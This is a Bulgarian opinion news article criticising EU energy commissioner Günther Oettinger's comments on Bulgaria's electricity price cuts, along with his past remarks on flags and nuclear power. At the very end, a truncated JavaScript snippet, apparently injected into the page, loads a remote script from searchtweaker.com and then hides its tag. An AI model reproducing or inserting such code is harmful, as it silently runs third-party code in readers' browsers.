Европейската комисия ни критикува за намаляването на цената на тока

 

1_OettingerЕврокомисарят по енергетиката Гюнтер Йотингер, който е германец и член на ХДС, както и на ЕНП разкритикува начина, по който България се опитва да се справи с енергийната бедност, съобщава "Дарик". Според Йотингер по-удачно е държавата да предоставя помощи на хората, които не са в състояние да плащат сметките си за отопление и осветление, а не да регулира цените. Еврокомисарят направи това изявление пред комисията по енергетика и промишленост към Европейския парламент.

 

Европейската комисия ще анализира причините за възникването на енергийната бедност в общността и начините за справяне с нея, допълни еврокомисарят по енергетиката.

 

Компенсирането на доходите заради цените на енергията може да бъде само временно решение, коментира и българският евродепутат от БСП Ивайло Калфин.

 

Преди около 2 години този еврокомисар се забърка в скандал, от който го спаси Барозу.

Еврокомисарят по енергетиката Гюнтер Йотингер трябваше да се извини или да напусне поста си в Брюксел. Това заявиха по онова време 151 евродепутати в писмо до председателя на Европейската комисия Жозе Мануел Барозу.

 

Повод за гневното обръщение стана изказване на Йотингер, според когото флаговете на държавите -членки, които имат твърде високи нива на дълга и дефицита, да бъдат снижени наполовина.

 

Коментарите на еврокомисаря означават "символично унижение за европейските нации", се казваше в писмото. "Господин Йотингер трябва да се откаже от думите си или да подаде оставката си от Европейската комисия", настояваха депутатите.

 

През 2011 г. България беше поне за статиската страна с фискална стабилност и нямаше високи нива на дълга и дефицита, а един кабинет на оставкаджии начело с г-н Борисов се тупаше н гърдите и се сочеха за пример и на тази основа българският трикольор трябваше да се развява високо, високо с флага на Германия, но само 18 месеца по-късно тази стабилност доведе до бунтове в най-бедната страна член на ЕС.

61070373

 

Преди два месеца българска делегация, водена от експремиера Бойко Борисов, бе на работно посещение в Долна Австрия родината на ЕVN. Двудневната визита бе по покана на министър-председателя д-р Ервин Прьол.

 

По време на тази визита в австрийската държава се акцентира върху факта,че тя се е отказала от изграждане на атомни мощности с референдум през 1978 г., а в момента се обсъждало и недопускането на възможността за внос на ток, произведен от ядрени централи.

 

Факт, който съвпадна с виждането на Йотингер, че на България не е нужна АЕЦ „Белене“.

През 2011 г. в репортаж за германската телевизия А Ер Де еврокомисарят Гюнтер Йотингер казва, че на срещата на ядрените експерти от ЕС в Брюксел ще се обмисля дали Европейският съюз може един ден да се откаже от ядрената енергетика.

 

Сега отново този еврокомисар се меси в нашите вътрешни работи и дава вероятни заявки да е говорител на монополите, като част от тях е австрийска и германска собственост.

 

Екип „Под лупа“ по материали от „Гласове“

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script)